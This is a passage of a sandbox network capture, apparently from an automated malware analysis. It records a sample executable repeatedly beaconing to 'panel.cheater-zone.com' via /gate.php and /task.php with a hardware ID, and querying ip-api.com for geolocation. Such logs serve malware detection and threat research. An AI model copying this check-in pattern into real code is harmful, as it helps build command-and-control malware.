    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:07.458165884 CET  935  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:07 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:07.623275995 CET  935  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:07.795058966 CET  936  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:07 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:07.903924942 CET  936  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:08.130971909 CET  936  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:08 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:08.278064966 CET  937  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:08.447007895 CET  937  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:08 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:09.027549982 CET  937  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:09.280329943 CET  938  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:09 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:09.440654993 CET  938  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:09.610276937 CET  938  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:09 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:10.163378954 CET  938  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:10.390861034 CET  939  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:10 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:10.546200037 CET  939  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:10.717154980 CET  940  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:10 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:10.821436882 CET  940  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:10.988811016 CET  940  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:10 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:11.100404978 CET  940  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:11.339256048 CET  941  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:11 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:11.444247007 CET  941  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:11.613493919 CET  941  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:11 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:11.725845098 CET  941  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:11.905600071 CET  942  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:11 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:12.007060051 CET  942  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:12.273540020 CET  943  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:12 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.386657953 CET943OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:12.557701111 CET943INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:12 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.663096905 CET944OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:12.837805033 CET944INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:12 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.944468975 CET944OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:13.206904888 CET945INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:13 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:13.319804907 CET945OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:13.550713062 CET945INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:13 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:13.663201094 CET946OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:13.849142075 CET947INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:13 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49720 | 92.249.45.113 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:27:18.300055981 CET | 947 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:27:18.484451056 CET | 948 | IN | HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:27:18 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:27:18.590637922 CET | 948 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:27:18.768790007 CET | 949 | IN | HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:27:18 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:27:18.873500109 CET | 949 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:27:19.052223921 CET | 949 | IN | HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:27:18 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:27:19.161968946 CET | 949 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:27:19.405400038 CET | 950 | IN | HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:27:19 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:27:19.525784016 CET | 950 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:27:19.703243017 CET | 950 | IN | HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:27:19 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:27:19.804735899 CET | 951 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:27:20.042505026 CET | 951 | IN | HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:27:19 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49704 | Destination IP: 208.95.112.18 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:11.630594015 CET | 106 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 23, 2023 21:25:11.664326906 CET | 106 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 47
X-Rl: 42
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49705 | Destination IP: 208.95.112.18 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:22.278419018 CET | 107 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 23, 2023 21:25:22.312055111 CET | 107 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:21 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 36
X-Rl: 41
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49706 | Destination IP: 208.95.112.18 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:22.916079998 CET | 108 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 23, 2023 21:25:22.949666977 CET | 108 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 36
X-Rl: 40
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49707 | Destination IP: 92.249.45.113 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:23.289814949 CET | 109 | OUT | GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
Host: panel.cheater-zone.com
Connection: Keep-Alive
Jan 23, 2023 21:25:23.524386883 CET | 109 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/8.0.25
content-type: text/html; charset=UTF-8
content-length: 4
date: Mon, 23 Jan 2023 20:25:23 GMT
server: LiteSpeed
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
Data Raw: ef bb bf 30
Data Ascii: 0
Jan 23, 2023 21:25:24.159368038 CET | 110 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
Host: panel.cheater-zone.com
Jan 23, 2023 21:25:24.331115007 CET | 110 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/8.0.25
content-type: text/html; charset=UTF-8
content-length: 3
date: Mon, 23 Jan 2023 20:25:24 GMT
server: LiteSpeed
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
Data Raw: ef bb bf
Data Ascii:


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49708 | Destination IP: 92.249.45.113 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:29.484357119 CET | 111 | OUT | GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
Host: panel.cheater-zone.com
Jan 23, 2023 21:25:29.625597000 CET | 111 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/8.0.25
content-type: text/html; charset=UTF-8
content-length: 3
date: Mon, 23 Jan 2023 20:25:29 GMT
server: LiteSpeed
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
Data Raw: ef bb bf
Data Ascii:


Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49709 | Destination IP: 92.249.45.113 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:33.866869926 CET | 112 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
Host: panel.cheater-zone.com
Jan 23, 2023 21:25:34.095911026 CET | 112 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/8.0.25
content-type: text/html; charset=UTF-8
content-length: 3
date: Mon, 23 Jan 2023 20:25:34 GMT
server: LiteSpeed
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
Data Raw: ef bb bf
Data Ascii:


Session ID: 8 | Source IP: 192.168.2.3 | Source Port: 49710 | Destination IP: 208.95.112.18 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:34.380011082 CET | 113 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 23, 2023 21:25:34.413429976 CET | 113 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:33 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 24
X-Rl: 39
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID: 9 | Source IP: 192.168.2.3 | Source Port: 49711 | Destination IP: 208.95.112.18 | Destination Port: 80 | Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:36.957734108 CET | 114 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 23, 2023 21:25:36.991178036 CET | 115 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 21
X-Rl: 38
